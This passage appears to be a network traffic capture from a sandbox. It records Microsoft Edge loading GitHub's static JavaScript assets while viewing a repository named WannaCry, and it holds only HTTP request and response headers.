sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 13 Sep 2024 14:50:55 GMT
etag: "0x8DCD403787F634B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1948822
x-served-by: cache-iad-kcgs7200073-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 58244
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a554f778acc55cce8d8900a9cd4927a0fa60c6b1
content-length: 4948
GET

https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:10 GMT
etag: "0x8DCDD8265CA851F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1900931
x-served-by: cache-iad-kiad7000079-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 100, 56190
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 83f0e5173b7e353a2e3d1527aa343980a51003ec
content-length: 3288
GET

https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:13 GMT
etag: "0x8DCB7D5A12FB424"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3628631
x-served-by: cache-iad-kiad7000173-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 13884, 71434
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8cce3e4b41609c3428818557c3502936148b7ebd
content-length: 3911
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:14 GMT
etag: "0x8DCB7D5A13B8DA9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4439255
x-served-by: cache-iad-kjyo7100041-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 5892, 73587
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c6fbbde7436236819792a003a05babc5303bd7fc
content-length: 18641
GET

https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:53 GMT
etag: 0x8DCAB55CA1D5FD6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 5667384
x-served-by: cache-iad-kjyo7100087-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 71476
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7fa6be5666c7f542d5560fe855e6b9840f83e8e1
content-length: 2385
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:53 GMT
etag: 0x8DCAB55CA1E2257
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 6785380
x-served-by: cache-iad-kcgs7200153-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 71516
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 631cb548c0a8d8ce8d5b6a3e68dd6e136adc0b70
content-length: 3816
GET

https://github.githubassets.com/assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 07:22:44 GMT
etag: "0x8DCDD32D992EAF2"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1948822
x-served-by: cache-iad-kjyo7100109-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 14, 58345
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 17fb379f93216aaceaaac7520148b79f2edb6675
content-length: 4344
GET

https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 14 Oct 2024 14:04:17 GMT
etag: "0x8DCEC5917FC85F4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 107755
x-served-by: cache-iad-kjyo7100057-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 5579
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3ed9af6c1862b0384b87a8e884b52eeb60c7bfa6
content-length: 38943
GET

https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-9a8cd2-373766bf71f1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:06 GMT
etag: "0x8DCB7D59CFCE0CF"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4458419
x-served-by: cache-iad-kjyo7100029-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 7855, 79268
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 43017b2db0c1bbc3b3d1123a64b5b2be96fa0e9f
content-length: 54857
GET

https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-695178a346e3.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/ui_packages_updatable-content_updatable-content_ts-695178a346e3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 25 Sep 2024 16:52:10 GMT
etag: "0x8DCDD8265CE7852"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1900931
x-served-by: cache-iad-kjyo7100070-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 100, 56997
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4f23059c7e7538debc8cb6dda5564de289243cf7
content-length: 12728
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-b94fd01cd2b1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-b94fd01cd2b1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 23 Jul 2024 20:26:52 GMT
etag: 0x8DCAB55C9E02677
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4509247
x-served-by: cache-iad-kjyo7100169-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 24, 71677
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c56d54bc7064c6b73ac426b0b5e62e0a53c2f55a
content-length: 4852
GET

https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_sticky-scroll-into-view_ts-112600808cf9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 16 Oct 2024 14:41:22 GMT
etag: "0x8DCEDF09AD50366"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 25521
x-served-by: cache-iad-kjyo7100172-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 35, 1704
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 483e27327d427bcafdf0f4f726c810a45994c267
content-length: 4759
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-579c1a5c7bf0.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-d0d0a6-579c1a5c7bf0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 15 Oct 2024 13:11:10 GMT
etag: "0x8DCED1AD6BB8C47"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 115191
x-served-by: cache-iad-kjyo7100073-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 3936
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 31771ad7532fdbc63bcdc5425dbf78cbe5a90186
content-length: 4079
GET

https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-aeae6fcdf371.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 08 Aug 2024 18:12:12 GMT
etag: "0x8DCB7D5A07BFBE6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 4444451
x-served-by: cache-iad-kiad7000133-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 15704, 71562
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 3ba934743e824624894436cb22120a67cfcd8aca
content-length: 4125
GET

https://github.githubassets.com/assets/behaviors-82ff75c964f1.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/behaviors-82ff75c964f1.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 22 Aug 2024 20:39:07 GMT
etag: "0x8DCC2EA7844F9E3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 3248045
x-served-by: cache-iad-kjyo7100115-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 34, 71736
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a51d2fd059946c7449fa6203e9d7c5f7ce720be8
content-length: 3083
GET

https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-bf7e5a3732fd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 17 Oct 2024 05:41:47 GMT
etag: "0x8DCEE6E646B3C8E"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 32484
x-served-by: cache-iad-kcgs7200142-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 8, 1435
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c58a6bc30b609046af269349201e5c0315d37503
content-length: 8283
GET

https://github.githubassets.com/assets/notifications-global-54f34167118d.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/notifications-global-54f34167118d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 15 Oct 2024 13:11:02 GMT
etag: "0x8DCED1AD1E390F4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 115342
x-served-by: cache-iad-kjyo7100149-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 3, 5896
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b7f6091e7a58106f071a254c3915cabc0d7595fd
content-length: 6058
GET

https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 02 Oct 2024 18:46:06 GMT
etag: "0x8DCE31279913895"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 1236206
x-served-by: cache-iad-kcgs7200146-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 37, 21379
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6783ebac1d8352020bce56947a21f0475b344119
content-length: 8095
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js

msedge.exe

Remote address:

185.199.111.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-e53a3f-96e856171702.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/limiteci/WannaCry
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 05 Aug 2024 19:46:33 GMT
etag: 0x8DCB5874F4B0508
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 17 Oct 2024 21:04:23 GMT
age: 5026437
x-served-by: cache-iad-kjyo7100032-IAD, cache-lcy-eglc8600092-LCY
x-cache: HIT, HIT
x-cache-hits: 17, 51110
